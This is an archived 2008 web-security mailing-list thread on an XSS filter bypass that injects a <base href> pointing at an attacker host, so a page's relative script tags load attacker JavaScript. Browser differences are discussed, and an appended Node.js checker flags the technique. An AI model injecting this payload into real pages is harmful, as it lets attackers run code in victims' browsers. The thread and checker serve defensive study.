
Re: [WEB SECURITY] Nice little XSS trick



James -

The trick still works in FF even if I set the doctype (4.01) to strict.

Thanks,
Prasad Shenoy

On Tue, Jul 15, 2008 at 1:17 PM, James Landis <jcl24@xxxxxxxxxxx> wrote:
> Sounds like this could be due to the difference between Strict and
> Quirks mode rendering.
>
> On Tue, Jul 15, 2008 at 10:00 AM, Prasad Shenoy <prasad.shenoy@xxxxxxxxx> wrote:
>> Definitely. Inserting a <base> tag in the <body> of an HTML document works
>> in Firefox 2.0.0.15
>>
>> Thanks
>> Prasad Shenoy
>>
>> On Tue, Jul 15, 2008 at 1:50 PM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>>> Prasad Shenoy wrote:
>>>>
>>>> Amit -
>>>>
>>>> When you say observed by FF 2, I guess you mean this should not work
>>>> in FF 2, correct? But it works with FF 2.
>>>>
>>>
>>> When I tested it, FF 2 ignored BASE tags outside the HEAD section (if you
>>> have information to the contrary, please share). That doesn't mean the
>>> attack completely fails - it means that the injection point must be inside
>>> the HEAD section (less common, but may still happen).
>>>
>>>> As this is a very simple example, I would like to believe that you are
>>>> assuming that in order to invoke functions from the attacker
>>>> controlled JS file (because there is no JS involved in the payload),
>>>> the attacker would create a file with the same filename and function
>>>> names as the one on the victim's domain. This way the actual (good) JS
>>>> file will be overwritten by the attacker controlled JS and all the
>>>> functions will be called from cross domain.
>>>>
>>>
>>> Exactly.
>>>
>>> -Amit
>>>
>>>
>>>> Valid?
>>>>
>>>> Thanks
>>>> Prasad Shenoy
>>>>
>>>> On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>>>>
>>>>>
>>>>> Hi list
>>>>>
>>>>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>>>>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not
>>>>> on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>>>>> BASE, but not the trick I describe here). The idea is to use the HTML BASE
>>>>> tag to force loading of JS code from the attacker's host. Consider a page
>>>>> with an XSS vulnerability such as:
>>>>>
>>>>> <html>
>>>>> ...
>>>>> ***XSS code may be embedded here***
>>>>> ...
>>>>> <script src="/foo/bar.js"></script>
>>>>> ...
>>>>> </html>
>>>>>
>>>>> Now, an attacker can inject <base href="http://www.attacker.tld/">, and
>>>>> next thing you know, the browser (IE, at least) loads the JS from
>>>>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>>>>> "explicit" JS code involved in the payload itself.
>>>>>
>>>>> Note that according to the HTML standard, BASE should be placed in the
>>>>> HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
>>>>> This is indeed observed by FF 2, but not by IE (checked IE6).
>>>>>
>>>>> Thanks,
>>>>> -Amit
>>>>>
>>>>>
>>>>>
>>>>> ----------------------------------------------------------------------------
>>>>> Join us on IRC: irc.freenode.net #webappsec
>>>>>
>>>>> Have a question? Search The Web Security Mailing List Archives:
>>>>> http://www.webappsec.org/lists/websecurity/archive/
>>>>>
>>>>> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>>>>>
>>>>> Join WASC on LinkedIn
>>>>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>> --
>> Ah! the joy of hacking....
>>



-- 
Ah! the joy of hacking....

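Added example, not code from the thread or from any of its participants: a small Node.js check (using only the built-in WHATWG URL class) that resolves a page's relative `<script src>` values the way a browser does once a `<base href>` is present, so a defender can see where `/foo/bar.js` would actually be fetched from, and that flags any `<base>` tag appearing outside `<head>`. The sample page and the host names in it are constructed placeholders.

```javascript
// Added example, not from the thread. Resolves <script src> values the way a
// browser does once a <base href> is present, and flags <base> outside <head>.

// Constructed sample page: a <base> injected into the body, followed by the
// site's own relative script reference. Host names are placeholders.
const PAGE_URL = "http://www.victim.example/page.html";
const SAMPLE_HTML = `<html><head><title>t</title></head><body>
<p>user content: <base href="http://www.attacker.example/"></p>
<script src="/foo/bar.js"></script>
</body></html>`;

// Returns the href of the first <base> tag, or null. Browsers honour only
// the first <base href> in a document, so later ones are ignored here too.
function firstBaseHref(html) {
  const m = html.match(/<base\b[^>]*\bhref\s*=\s*["']?([^"'\s>]+)/i);
  return m ? m[1] : null;
}

// True when a <base> tag appears after </head> (or when there is no head),
// which is the injection position discussed in the thread.
function hasBaseOutsideHead(html) {
  const headEnd = html.search(/<\/head\s*>/i);
  const re = /<base\b/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (headEnd === -1 || m.index > headEnd) return true;
  }
  return false;
}

// Resolves every <script src>: relative URLs are resolved against the first
// <base href> (itself resolved against the page URL), or against the page
// URL when the document has no <base>.
function resolveScriptSources(html, pageUrl) {
  const base = firstBaseHref(html);
  const effectiveBase = base ? new URL(base, pageUrl).href : pageUrl;
  const re = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(new URL(m[1], effectiveBase).href);
  return out;
}

// Defender's check: scripts that would be fetched from a host other than the
// page's own origin. For the sample page this is the attacker's copy of bar.js.
function foreignScripts(html, pageUrl) {
  const origin = new URL(pageUrl).origin;
  return resolveScriptSources(html, pageUrl).filter((u) => new URL(u).origin !== origin);
}
```

Serving script references as absolute same-origin URLs, or restricting the document base with the Content-Security-Policy `base-uri` directive, removes the resolution step this check looks for.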
Brought to you by http://www.webappsec.org